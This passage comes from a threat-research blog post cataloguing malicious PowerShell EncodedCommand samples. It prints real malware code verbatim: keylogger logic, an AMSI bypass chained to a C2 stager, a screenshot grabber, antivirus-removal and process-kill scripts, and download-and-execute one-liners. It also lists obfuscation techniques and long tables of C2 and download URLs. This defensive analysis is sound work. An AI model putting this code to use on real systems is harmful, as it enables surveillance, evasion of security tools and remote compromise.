($RightMouse)   {$LogOutput += '[Right Mouse]'}\r\nFunction DynAKey –\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n$LeftShift = $ImportDll::GetAsyncKeyState(160)\r\n$RightShift = $ImportDll::GetAsyncKeyState(161)\r\n$LeftCtrl = $ImportDll::GetAsyncKeyState(162)\r\n$RightCtrl = $ImportDll::GetAsyncKeyState(163)\r\n$LeftAlt = $ImportDll::GetAsyncKeyState(164)\r\n$RightAlt = $ImportDll::GetAsyncKeyState(165)\r\n$TabKey = $ImportDll::GetAsyncKeyState(9)\r\n$SpaceBar = $ImportDll::GetAsyncKeyState(32)\r\n$DeleteKey = $ImportDll::GetAsyncKeyState(127)\r\n$EnterKey = $ImportDll::GetAsyncKeyState(13)\r\n$BackSpaceKey = $ImportDll::GetAsyncKeyState(8)\r\n$LeftArrow = $ImportDll::GetAsyncKeyState(37)\r\n$RightArrow = $ImportDll::GetAsyncKeyState(39)\r\n$UpArrow = $ImportDll::GetAsyncKeyState(38)\r\n$DownArrow = $ImportDll::GetAsyncKeyState(34)\r\n$LeftMouse = $ImportDll::GetAsyncKeyState(1)\r\n$RightMouse = $ImportDll::GetAsyncKeyState(2)\r\nif ((($LeftShift -eq -32767) -or ($RightShift -eq -32767)) -or (($LeftShift -eq -32768) -or ($RightShfit -eq\r\n-32768))) {$LogOutput += '[Shift] '}\r\nif ((($LeftCtrl -eq -32767) -or ($LeftCtrl -eq -32767)) -or (($RightCtrl -eq -32768) -or ($RightCtrl -eq -32768)))\r\n{$LogOutput += '[Ctrl] '}\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 21 of 35\n\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\nif ((($LeftAlt -eq -32767) -or ($LeftAlt -eq -32767)) -or (($RightAlt -eq -32767) -or ($RightAlt -eq -32767)))\r\n{$LogOutput += '[Alt] '}\r\nif (($TabKey -eq -32767) -or ($TabKey -eq -32768)) {$LogOutput += '[Tab] '}\r\nif (($SpaceBar -eq -32767) -or ($SpaceBar -eq -32768)) {$LogOutput += '[SpaceBar] '}\r\nif (($DeleteKey -eq -32767) -or ($DeleteKey -eq -32768)) {$LogOutput += '[Delete] '}\r\nif (($EnterKey -eq -32767) -or ($EnterKey -eq -32768)) {$LogOutput += '[Enter] '}\r\nif (($BackSpaceKey -eq -32767) -or ($BackSpaceKey -eq -32768)) {$LogOutput += '[Backspace] '}\r\nif (($LeftArrow -eq -32767) -or ($LeftArrow -eq -32768)) {$LogOutput += '[Left Arrow] '}\r\nif (($RightArrow -eq -32767) -or ($RightArrow -eq -32768)) {$LogOutput += '[Right Arrow] '}\r\nif (($UpArrow -eq -32767) -or ($UpArrow -eq -32768)) {$LogOutput += '[Up Arrow] '}\r\nif (($DownArrow -eq -32767) -or ($DownArrow -eq -32768)) {$LogOutput += '[Down Arrow] '}\r\nif (($LeftMouse -eq -32767) -or ($LeftMouse -eq -32768)) {$LogOutput += '[Left Mouse] '}\r\nif (($RightMouse -eq -32767) -or ($RightMouse -eq -32768)) {$LogOutput += '[Right Mouse] '}\r\nOther Techniques\r\nAMSI Bypass (8 Samples – 0.20% Coverage)\r\nAntimalware Scan Interface (AMSI) is a new feature Microsoft released in Windows 10 and is designed to facilitate\r\ncommunication between applications and AV products. Ideally, the application (PowerShell in this context) will take the\r\nscript at runtime, after it’s deobfuscated or pulled in remotely from a website, and pass it through AMSI to your AV for\r\nscanning. If the AV software determines it’s malicious, it can now block the scripts execution.\r\n#YAOMG (Yet Another of Matt Graebers)\r\nMatt Graeber released a one-line tweet  that shows how you can bypass AMSI by simply changing “amsiInitFailed” to\r\n“True”, which makes it appear as if it failed to load and effectively skips this check.\r\n[ReF].ASSEmbly.GetTYpe('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFIElD('amsiInitFailed','NonPublic,Static').SetVAlue($Nu\r\nSystem.NET.WebClieNt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HEAdERs.ADD('User-Agent',$u);$wC\r\n[SYSteM.NEt.CReDentIalCAcHe]::DeFAulTNetwORKCREdEntialS;$K=[SySTEm.TexT.EncodING]::ASCII.GETBYteS('Dv,inKZ\u0026lt;@{3mjG4\u0026\r\n($J+$S[$_]+$K[$_%$K.COuNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I\r\nBxor$S[($S[$I]+$S[$H])%256]}};$Wc.HEaDERs.ADD(\"Cookie\",\"session=Pu8sEnIpxIwINbUOVsxlL66DoHA=\");$ser='http://35.165.38[.]15:80'\r\nJoIn[CHAr[]](\u0026amp; $R $data ($IV+$K))|IEX\r\nThe code shares a similar signature to PowerShell Empire’s XOR routine for their EncryptedScriptDropper and may be\r\nrelated or borrowed code.\r\nPowerSploit GTS (3 Samples – 0.07% Coverage)\r\nThis is set of samples that simply use a module from another tool, in this case, the PowerSploit Get-TimedScreenshot. The\r\ncode will take a screenshot using Drawing.Bitmap every 2 seconds.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\nfunction Get-TimedScreenshot\r\n{\r\n    [CmdletBinding()] Param(\r\n        [Parameter(Mandatory=$True)]\r\n        [ValidateScript({Test-Path -Path $_ })]\r\n        [String] $Path,\r\n        [Parameter(Mandatory=$True)]\r\n        [Int32] $Interval,\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 22 of 35\n\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n        [Parameter(Mandatory=$True)]\r\n        [String] $EndTime\r\n    )\r\n    Function Get-Screenshot {\r\n       $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen\r\n       $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height\r\n       $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)\r\n       $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty,\r\n$ScreenBounds.Size)\r\n       $DrawingGraphics.Dispose()\r\n       $ScreenshotObject.Save($FilePath)\r\n       $ScreenshotObject.Dispose()\r\n    }\r\n    Try {\r\n        #load required assembly\r\n        Add-Type -Assembly System.Windows.Forms\r\n        Do {\r\n            #get the current time and build the filename from it\r\n            $Time = (Get-Date)\r\n            [String] $FileName = \"$($Time.Month)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Day)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Year)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Hour)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Minute)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Second)\"\r\n            $FileName += '.png'\r\n            [String] $FilePath = (Join-Path $Path $FileName)\r\n            Get-Screenshot\r\n            Start-Sleep -Seconds $Interval\r\n        }\r\n        While ((Get-Date -Format HH:mm) -lt $EndTime)\r\n    }\r\n    Catch {Write-Error $Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage}\r\n}\r\nGet-TimedScreenshot -Path \"$env:userprofile\\Desktop\" -Interval 2 -EndTime 24:00\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 23 of 35\n\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\nFor these types of attacks, the PowerShell code is just an augmentation to the overarching suite of tools being used in the\r\nattack, likely intended to save the attacker time in developing the desired functionality. In this case, Microsoft Excel\r\ndocuments contained macros that first launch a function to decode the PowerShell code and begin taking screenshots while a\r\nsecond function is called afterwards to decode a PE file that handles the rest of the attack.\r\nFigure 7 Excel Macro decodes embedded Powershell script and PE file.\r\nRemove AV (2 Samples – 0.05% Coverage)\r\nThis next variant uses PowerShell to forcefully uninstall both x86 and x64 versions of an installed AV application. It iterates\r\nover entries in the Uninstall registry path to find items with “*AVG*” and then quietly uninstalls each instance.\r\n$uninstall32s = gci \"HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" | foreach\r\n{ gp $_.PSPath } | ? { $_ -like \"*AVG*\" } | select UninstallString;$uninstall64s = gci\r\n\"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" | foreach { gp $_.PSPath } | ? { $_ -like\r\n\"*AVG*\" } | select UninstallString;foreach($uninstall64 in $uninstall64s) {$uninstall64 =\r\n$uninstall64.UninstallString -Replace \"MsiExec.exe\",\"\" -Replace \"/I\",\"\" -Replace \"/X\",\"\";$uninstall64 =\r\n$uninstall64.Trim();if($uninstall64 -like \"*/mode=offline*\"){}else{Write-Warning $uninstall64; start-process\r\n\"msiexec.exe\" -args \"/x $uninstall64  /qn /norestart\" -Wait }};foreach($uninstall32 in $uninstall32s) {$uninstall32 =\r\n$uninstall32.UninstallString -Replace \"MsiExec.exe\",\"\" -Replace \"/I\",\"\" -Replace \"/X\",\"\";$uninstall32 =\r\n$uninstall32.Trim();if($uninstall32 -like \"*/mode=offline*\"){}else{Write-Warning $uninstall32; start-process\r\n\"msiexec.exe\" -args \"/x $uninstall32  /qn /norestart\" -Wait }};\r\nNotable One-Offs\r\nAfter identifying as many variants as possible, I was left with around 100 “Unknown” samples, which were usually custom\r\nspins on the techniques described above. I’ll end this cataloging with a quick overview of some of the more notable samples.\r\nHidden Messages\r\nThis sample does some basic date checking through PowerShell and compares current datetime to an included datetime, if\r\nthe current datetime is past the included one, it will not run. At the end of the code though, they leave a commented call-out\r\nto, possibly, their “hacking” group.\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 24 of 35\n\nif ((Get-Date).Ticks -lt (Get-Date -Date '18-jan-2017 00:00:00').Ticks) {(New-Object\r\nSystem.Net.WebClient).DownloadFile('http://drobbox-api.dynu[.]com/update',\"$env:temp\\update\");Start-Process\r\npythonw.exe \"$env:temp\\update 31337\"};#NIXU17{pow3r_t0_the_sh3lls}\r\nAnother example of leaving hidden messages is in the sample below.\r\nwhile($true){Start-Sleep -s 120; $m=New-Object System.Net.WebClient;$pr =\r\n[System.Net.WebRequest]::GetSystemWebProxy();$pr.Credentials=\r\n[System.Net.CredentialCache]::DefaultCredentials;$m.proxy=$pr;$m.UseDefaultCredentials=$true;$m.Headers.Add('user-agent', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)');\r\niex(($m.downloadstring('https://raw.githubusercontent.com/rollzedice/js/master/drupal.js')));}\r\nWhen you analyze the code it pulls down remotely from GitHub, which at the time of this writing kills PowerShell\r\nprocesses, it says “Hello SOC/IR team!  :-)”. It’s possible this is just a pentest or red-team exercise given the history of the\r\nfile using “Test” a lot.\r\nFigure 8 JavaScript file kills powershell and greets SOC/IR team.\r\nProcess Killing\r\nThis is another example of using PowerShell for specific purposes in an overarching attack. It will kill a number of\r\nprocesses typically associated with malware analysis.\r\nkill -processname Taskmgr, ProcessHacker*, Procmon*, Procexp*, Procdump* -force\r\nLayers of Obfuscation\r\nFor this last example, it appears to be related to the samples shown in the “PowerSploit GTS” variants, as the originating\r\nmacros are almost identical, but this sample did not use any of the other pieces.\r\nThis particular sample uses multiple layers of obfuscation to carry out its attack.\r\nLayer 1 –\r\nA Microsoft Excel document has a macro that pulls a base64 encoded data from a cell that is passes to PowerShell’s\r\nEncodedCommand parameter when it launches.\r\nLayer 2 –\r\nThe decoded base64 is a long array of int values that get converted to their char value, and then executed as another\r\nPowerShell script.\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 25 of 35\n\n-JOIn (( 32 ,32 , 36 ,86 ,115 , 110 , 50,108 , 54, 32 ,61 , 32,32 , 91,116,121,112,101, 93 ,40 ,34,123 ,51 , 125 , 123,\r\n48 ,125, 123, 49, 125, ,53, 45 ,49, 54,55 , 45,39, 44 ,39 ,101 , 46 , 97, 109, 97 , 122 ,111,110 ,97, 39, 44, 39 ,53,39,\r\n44,39, 119 , 115, 46, 99 , 111 , 109 ,58, 56 , 48 , 39 ,44 ,39,45 , 119, 101 ,115 , 39,41, 41 , 59)|%{([inT]$_-AS\r\n[chAr]) } ) | iex\r\nLayer 3 –\r\nThe decoded data uses various techniques to obfuscate itself. The first technique is injecting backtick characters between\r\nother characters, which will be ignored at runtime. This is similar to the caret injection technique from the command-line,\r\nbut works within the PowerShell code instead.\r\nIt also uses a technique commonly seen in other scripting languages by breaking up a string into a randomized list and then\r\nrebuilding the original string by calling specific values.\r\n$Vsn2l6 =  [type](\"{3}{0}{1}{2}\" -F\\'UE\\',\\'S\\',\\'t\\',\\'Net.webreq\\') ;  $h69Q4  =[TYPe](\"{1}{2}{3}{4}{0}\"-F\r\n\\'he\\',\\'nEt.C\\',\\'REDeNtialC\\',\\'a\\',\\'c\\') ;  ${J}=\u0026amp;(\"{0}{1}{2}\"-f \\'new-obj\\',\\'ec\\',\\'t\\') (\"{2}{1}{0}{3}\" -f\r\n\\'eb\\',\\'.w\\',\\'net\\',\\'client\\');${j}.\"PRo`XY\"=  ( VaRIablE  vsn2L6 ).VaLuE::(\"{0}{3}{2}{4}{1}\"-\r\nf\\'GetS\\',\\'Proxy\\',\\'em\\',\\'yst\\',\\'Web\\').Invoke();${j}.\"pr`OXY\".\"C`RE`De`NTiALs\"= (  GeT-VariaBle  H69Q4).VaLUe::\"DE`Faultcred`en`TI`ALS\";.(\"{0}{1}\"-f \\'I\\',\\'EX\\') ${J}.(\"{1}{3}{2}{0}\" -f\r\n\\'string\\',\\'do\\',\\'load\\',\\'wn\\').Invoke((\"{3}{1}{9}{11}{8}{13}{0}{4}{15}{5}{10}{2}{12}{14}{7}{6}\" -\r\nf\\'5\\',\\'tp://\\',\\'mput\\',\\'ht\\',\\'.us\\',\\'t\\',\\'0/anSfrf\\',\\'8\\',\\'185-\\',\\'e\\',\\'-2.co\\',\\'c2-35-167-\r\n\\',\\'e.amazona\\',\\'5\\',\\'ws[.]com:80\\',\\'-wes\\'));\r\nCleaning up the code and building the strings shows that it downloads code remotely to pass to Invoke-Expression.\r\n$Vsn2l6 = [type]Net.webreqUESt;\r\n$h69Q4 = [TYPe]nEt.CREDeNtialCache;\r\n\u0026amp;new-object net.webclient;\r\nPRoXY = $Vsn2l6.VaLuE::GetSystemWebProxy.Invoke();\r\nprOXY.CREDeNTiALs = ( GeT-VariaBle $h69Q4 ).VaLUe::DEFaultcredenTIALS;\r\n.IEX downloadstring.Invoke(http://ec2-35-167-185-55.us-west-2.compute.amazonaws[.]com:8080/anSfrf);\r\nConclusion\r\nPowerShell is a robust scripting framework that offers a lot of capabilities, both for defense and offense. Hopefully this blog\r\nhas served to highlight some of the current techniques being used in tools and attacks.\r\nAcross these samples, it seems clear that the majority of attacks are still relying on public tools, which isn’t surprising. As\r\nthe PowerShell framework continues to be explored and matured, I suspect we will begin to see a lot more variation in\r\nattacks coming from this space. As it stands today, PowerShell seems to be mainly used as a tool to facilitate common\r\nfunctions attackers are used to within other frameworks, but will eventually start to take advantage of more native features\r\nonce we move out of the “transference” phase to an “innovative” phase.\r\nObserved C2 or Download Sites\r\nDownloader DFSP\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n675 hxxp://94[.]102.53.238/~yahoo/csrsv.exe\r\n244 hxxp://89[.]248.170.218/~yahoo/csrsv.exe\r\n132 hxxp://94[.]102.58.30/~trevor/winx64.exe\r\n70 hxxp://80[.]82.64.45/~yakar/msvmonr.exe\r\n24 hxxp://89[.]248.166.140/~zebra/iesecv.exe\r\n18 hxxp://cajos[.]in/0x/1.exe\r\n14 hxxp://93[.]174.94.137/~karma/scvhost.exe\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 26 of 35\n\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n6 hxxp://ddl7[.]data.hu/get/0/9507148/Patload.exe\r\n5 hxxp://nikil[.]tk/p1/Pa_001.exe\r\n5 hxxp://185[.]45.193.17/update.exe\r\n5 hxxp://185[.]141.27.28/update.exe\r\n4 hxxps://a[.]pomf.cat/xsakpo.exe\r\n4 hxxp://185[.]141.27.35/update.exe\r\n3 hxxp://www[.]macwizinfo.com/updates/anna.exe\r\n3 hxxp://worldnit[.]com/opera.exe\r\n3 hxxp://doc[.]cherrycoffeeequipment.com/nw/logo.png\r\n3 hxxp://185[.]141.25.142/update.exe\r\n3 hxxp://185[.]117.75.43/update.exe\r\n3 hxxp://185[.]106.122.64/update.exe\r\n2 hxxp://185[.]141.25.243/file.exe\r\n2 hxxp://185[.]141.27.32/update.exe\r\n2 hxxp://185[.]141.27.34/update.exe\r\n2 hxxp://andersonken4791[.]pserver.ru/doc.exe\r\n2 hxxp://boisedelariviere[.]com/backup/css/newconfig.exe\r\n2 hxxp://brokelimiteds[.]in/wp-admin/css/upload/Order.exe\r\n2 hxxp://ddl7[.]data.hu/get/0/9499830/money.exe\r\n2 hxxp://fetzhost[.]net/files/044ae4aa5e0f2e8df02bd41bdc2670b0.exe\r\n2 hxxp://hnng[.]moe/f/InX\r\n2 hxxp://hnng[.]moe/f/Iot\r\n2 hxxp://labid[.]com.my/m/m1.exe\r\n2 hxxp://labid[.]com.my/power/powex.exe\r\n2 hxxp://labid[.]com.my/spe/spendy.exe\r\n2 hxxp://lvrxd[.]3eeweb.com/nano/Calculator.exe\r\n2 hxxp://matkalv[.]5gbfree.com/loso/fasoo.exe\r\n2 hxxp://net[.]gethost.pw/windro.exe\r\n2 hxxp://nikil[.]tk/i1/iz_001.exe\r\n2 hxxp://rgho[.]st/68lJcGFLW\r\n2 hxxp://rgho[.]st/6hrkjYlX4\r\n2 hxxp://toxicsolutions[.]ru/upload/praisefud.exe\r\n2 hxxp://worldnit[.]com/KUKU.exe\r\n2 hxxp://worldnit[.]com/kundelo.exe\r\n2 hxxp://worldnit[.]com/operamini.exe\r\n2 hxxp://www[.]wealthandhealthops.com/modules/mod_easyblogquickpost/lawdsijdoef.exe\r\n2 hxxps://a[.]pomf.cat/drktzz.exe\r\n2 hxxps://a[.]pomf.cat/dwnysn.exe\r\n2 hxxps://a[.]pomf.cat/dwnysn.exe\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 27 of 35\n\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n73\r\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n81\r\n82\r\n83\r\n84\r\n85\r\n2 hxxps://a[.]pomf.cat/hsmqrh.exe\r\n2 hxxps://a[.]pomf.cat/mjnspx.exe\r\n2 hxxps://a[.]pomf.cat/pabfzv.exe\r\n2 hxxps://a[.]pomf.cat/qolcls.exe\r\n2 hxxps://a[.]pomf.cat/tpaesb.exe\r\n2 hxxps://a[.]pomf.cat/ultxkr.exe\r\n2 hxxps://a[.]pomf.cat/vhcwbo.exe\r\n2 hxxps://a[.]pomf.cat/vjadwb.exe\r\n2 hxxps://a[.]pomf.cat/wopkwj.exe\r\n2 hxxps://a[.]pomf.cat/yspcsr.exe\r\n2 hxxps://www[.]dropbox.com/s/gx6kxkfi7ky2j6f/Dropbox.exe?dl=1\r\n1 hxxp://185[.]106.122.62/file.exe\r\n1 hxxp://185[.]45.193.169/update.exe\r\n1 hxxp://31[.]184.234.74/crypted/1080qw.exe\r\n1 hxxp://aircraftpns[.]com/_layout/images/sysmonitor.exe\r\n1 hxxp://allbestunlockerpro[.]com/flash.player.exe\r\n1 hxxp://anonfile[.]xyz/f/3d0a4fb54941eb10214f3c1a5fb3ed99.exe\r\n1 hxxp://anonfile[.]xyz/f/921e1b3c55168c2632318b6d22a7bfe6.exe\r\n1 hxxp://brokelimiteds[.]in/wp-admin/css/upload/ken1.exe\r\n1 hxxp://cajos[.]in/0x/1.exe\r\n1 hxxp://danhviet[.]com.vn/app/p2.exe\r\n1 hxxp://danhviet[.]com.vn/z/v/doc.exe\r\n1 hxxp://daratad[.]5gbfree.com/uses/word.exe\r\n1 hxxp://ddl2[.]data.hu/get/0/9589621/k000.exe\r\n1 hxxp://ddl3[.]data.hu/get/0/9535517/yhaooo.exe\r\n1 hxxp://ddl3[.]data.hu/get/0/9551162/ske.exe\r\n1 hxxp://ddl7[.]data.hu/get/0/9552103/PFIfdp.exe\r\n1 hxxp://getlohnumceders[.]honor.es/kimt.exe\r\n1 hxxp://hinrichsen[.]de/assets/win1/win1.exe\r\n1 hxxp://icbg-iq[.]com/Scripts/kinetics/categories/3rmax.exe\r\n1 hxxp://khoun-legal[.]com/download/ctob.exe\r\n1 hxxp://kiana[.]com/flowplayer/aquafresh.exe\r\n1 hxxp://labid[.]com.my/power/powex.exe\r\n1 hxxp://matkalv[.]5gbfree.com/calab/calafile.exe\r\n1 hxxp://matkalv[.]5gbfree.com/noza/odeee.exe\r\n1 hxxp://matkalv[.]5gbfree.com/owee/owe.exe\r\n1 hxxp://matkalv[.]5gbfree.com/vosa/doc.exe\r\n1 hxxp://nikil[.]tk/b1/bo_001.exe\r\n1 hxxp://nikil[.]tk/k1/ik_001.exe\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 28 of 35\n\n86\r\n87\r\n88\r\n89\r\n90\r\n91\r\n92\r\n93\r\n94\r\n95\r\n96\r\n97\r\n98\r\n99\r\n100\r\n101\r\n102\r\n103\r\n104\r\n105\r\n106\r\n107\r\n108\r\n109\r\n110\r\n111\r\n112\r\n113\r\n114\r\n115\r\n116\r\n117\r\n118\r\n119\r\n120\r\n121\r\n122\r\n123\r\n124\r\n1 hxxp://sukem[.]zapto.org/word.exe\r\n1 hxxp://trolda[.]5gbfree.com/fosee/doc.exe\r\n1 hxxp://worldnit[.]com/aba.exe\r\n1 hxxp://worldnit[.]com/aba.exe\r\n1 hxxp://worldnit[.]com/abacoss.exe\r\n1 hxxp://worldnit[.]com/abuchi.exe\r\n1 hxxp://worldnit[.]com/com.exe\r\n1 hxxp://worldnit[.]com/com.exe\r\n1 hxxp://worldnit[.]com/compu.exe\r\n1 hxxp://worldnit[.]com/comu.exe\r\n1 hxxp://worldnit[.]com/firefox32.exe\r\n1 hxxp://worldnit[.]com/igbo.exe\r\n1 hxxp://worldnit[.]com/immo.exe\r\n1 hxxp://worldnit[.]com/kele.exe\r\n1 hxxp://worldnit[.]com/kelle.exe\r\n1 hxxp://worldnit[.]com/kells.exe\r\n1 hxxp://worldnit[.]com/kuku.exe\r\n1 hxxp://worldnit[.]com/nigga.exe\r\n1 hxxp://worldnit[.]com/nigga.exe\r\n1 hxxp://worldnit[.]com/office.exe\r\n1 hxxp://worldnit[.]com/pony.exe\r\n1 hxxp://worldnit[.]com/seccrypt.exe\r\n1 hxxp://worldnit[.]com/sect.exe\r\n1 hxxp://www[.]athensheartcenter.com/crm/cgi-bin/lnm.exe\r\n1 hxxp://www[.]bryonz.com/emotions/files/lnwe.exe\r\n1 hxxp://www[.]fluidsystems.ml/P1/Pa_001.exe\r\n1 hxxp://www[.]macwizinfo.com/updates/eter.exe\r\n1 hxxp://www[.]matrimonioadvisor.it/pariglia.exe\r\n1 hxxp://www[.]pelicanlinetravels.com/images/xvcbkty.exe\r\n1 hxxp://www[.]telemedia.co.za/wp-content/ozone/slim.exe\r\n1 hxxp://www[.]wealthandhealthops.com/modules/mod_easybloglist/kntgszu.exe\r\n1 hxxp://www[.]wvhmedicine.ru/1/P2.exe\r\n1 hxxps://1fichier[.]com/?hfshjhm0yf\r\n1 hxxps://1fichier[.]com/?v8w3g736hj\r\n1 hxxps://a[.]pomf.cat/jfyywz.exe\r\n1 hxxps://a[.]pomf.cat/klckcp.exe\r\n1 hxxps://a[.]pomf.cat/wopkwj.exe\r\n1 hxxps://a[.]pomf.cat/yhggkj.exe\r\n1 hxxps://dryversdocumentgritsettings[.]com/javaupdat3s2016.exe\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 29 of 35\n\n125\r\n126\r\n1 hxxps://megadl[.]fr/?b5r5bstqd1\r\n1 hxxps://srv-file1[.]gofile.io/download/SJLKaG/84.200.65.20/wscript.exe\r\nPowerShell Empire\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n39 hxxp://198[.]18.133.111:8081/index.asp\r\n8 hxxp://95[.]211.139.88:80/index.asp\r\n5 hxxps://46[.]101.90.248:443/index.asp\r\n5 hxxp://microsoft-update7[.]myvnc.com:443/index.asp\r\n5 hxxp://145[.]131.7.190:8080/index.asp\r\n3 hxxps://52[.]39.227.108:443/index.asp\r\n3 hxxp://vanesa[.]ddns.net:443/index.asp\r\n3 hxxp://polygon[.]1dn0.xyz/index.asp\r\n3 hxxp://159[.]203.18.172:8080/index.asp\r\n2 hxxps://dsecti0n[.]gotdns.ch:8080/index.asp\r\n2 hxxps://69[.]20.66.229:9443/index.asp\r\n2 hxxps://50[.]3.74.72:8080/index.asp\r\n2 hxxps://205[.]232.71.92:443/index.asp\r\n2 hxxp://hop[.]wellsfargolegal.com/index.asp\r\n2 hxxp://ciagov[.]gotdns.ch:8080/index.asp\r\n2 hxxp://chgvaswks045[.]efgz.efg.corp:888/index.asp\r\n2 hxxp://ads[.]mygoogle-analytics.com:80/index.asp\r\n2 hxxp://84[.]200.84.185:443/index.asp\r\n2 hxxp://84[.]14.146.74:443/index.asp\r\n2 hxxp://66[.]11.115.25:8080/index.asp\r\n2 hxxp://64[.]137.176.174:12345/index.asp\r\n2 hxxp://52[.]28.242.165:8080/index.asp\r\n2 hxxp://52[.]19.131.17:80/index.asp\r\n2 hxxp://23[.]239.12.15:8080/index.asp\r\n2 hxxp://212[.]99.114.202:443/count.php?user=\r\n2 hxxp://188[.]68.59.11:8081/index.asp\r\n2 hxxp://185[.]117.72.45:8080/index.asp\r\n2 hxxp://163[.]172.175.132:8089/index.asp\r\n2 hxxp://159[.]203.89.248:80/index.asp\r\n2 hxxp://14[.]144.144.66:8081/index.asp\r\n2 hxxp://103[.]238.227.201:7788/index.asp\r\n1 hxxps://www[.]enterprizehost.com:9443/index.asp\r\n1 hxxps://sixeight[.]av-update.com:443/index.asp\r\n1 hxxps://remote-01[.]web-access.us/index.asp\r\n1 hxxps://msauth[.]net/index.asp\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 30 of 35\n\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n73\r\n74\r\n1 hxxps://metrowifi[.]no-ip.org:8443/index.asp\r\n1 hxxps://megalon[.]trustwave.com:443/index.asp\r\n1 hxxps://mail[.]microsoft-invites.com/index.asp\r\n1 hxxps://logexpert[.]eu/index.asp\r\n1 hxxps://host-101[.]ipsec.io/index.asp\r\n1 hxxps://93[.]176.84.45:443/index.asp\r\n1 hxxps://93[.]176.84.34:443/index.asp\r\n1 hxxps://66[.]60.224.82:443/index.asp\r\n1 hxxps://66[.]192.70.39:443/index.asp\r\n1 hxxps://66[.]192.70.38:80/index.asp\r\n1 hxxps://52[.]86.125.177:443/index.asp\r\n1 hxxps://50[.]251.57.67:8080/index.asp\r\n1 hxxps://46[.]101.203.156:443/index.asp\r\n1 hxxps://46[.]101.185.146:8080/index.asp\r\n1 hxxps://45[.]63.109.205:8443/index.asp\r\n1 hxxps://172[.]30.18.11:443/index.asp\r\n1 hxxps://146[.]148.58.157:8088/index.asp\r\n1 hxxps://108[.]61.211.36/index.asp\r\n1 hxxps://107[.]170.132.24:443/index.asp\r\n1 